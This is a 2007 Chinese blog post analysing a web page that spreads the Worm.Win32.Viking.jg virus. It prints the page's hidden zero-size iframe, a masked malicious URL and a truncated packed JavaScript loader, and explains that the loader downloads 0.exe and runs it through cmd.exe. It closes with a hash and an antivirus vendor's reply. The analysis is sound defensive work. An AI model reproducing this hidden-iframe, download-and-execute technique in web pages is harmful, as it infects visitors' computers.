03-19/一个传播 Worm.Win32.Viking.jg的 网页，解密有点难度(第2版)

endurer 原创
2007-03-19 第2版 补充瑞星的反应
2007-03-18 第1版

该网页包含代码：
/---
＜iframe src＝"hxxp://www.54***69*9.com/wm***/2***0/1**.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://www.54***69*9.com/wm***/2***0/1**.htm 包含代码：

/---
＜script src＝css.js＞＜/script＞
---/

hxxp://www.54***69*9.com/wm***/2***0/css.js 的内容为 JavaScript代码：
/---
eval(function(p,a,c,k,e,d){e＝function(c){return(c＜a?"":e(parseInt(c/a)))+((c＝c%a)＞35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]＝k[c]||e(c);k＝[function(e){return d[e]}];e＝function(){return'//w+'};c＝1;};while(c--)if(k[c])p＝p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('Z("//l//v……（略）……110|114'.split('|'),0,{}))
---/

解密结果为 一段JavaScript脚本代码，主要功能是运行自定义函数 gn(n)，利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 0.exe，保存为 %windir%/~tmp.tmp，
并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令：%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。

文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-18 21:11:10
修改时间 : 2007-3-18 21:11:13
访问时间 : 2007-3-18 21:11:41
大小 : 60573 字节 59.157 KB
MD5 : ae94cf26d3cf1ddfec5acd7270045e54

Kaspersky报为：Worm.Win32.Viking.jg 

主　题：	病毒上报邮件分析结果－流水单号:6144801
发件人：	"" <[email protected]>

尊敬的客户，您好！
    您的邮件已经收到，感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：
    1.文件名：0.exe
    病毒名： Worm.Viking.pk

    我们将在较新的19.15.10版本(瑞星2006的18.71.10版本)中处理解决，请您届时将您的瑞星软件升级到19.15.10(瑞星2006的18.71.10版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话，我们会推迟一到两版本后升级。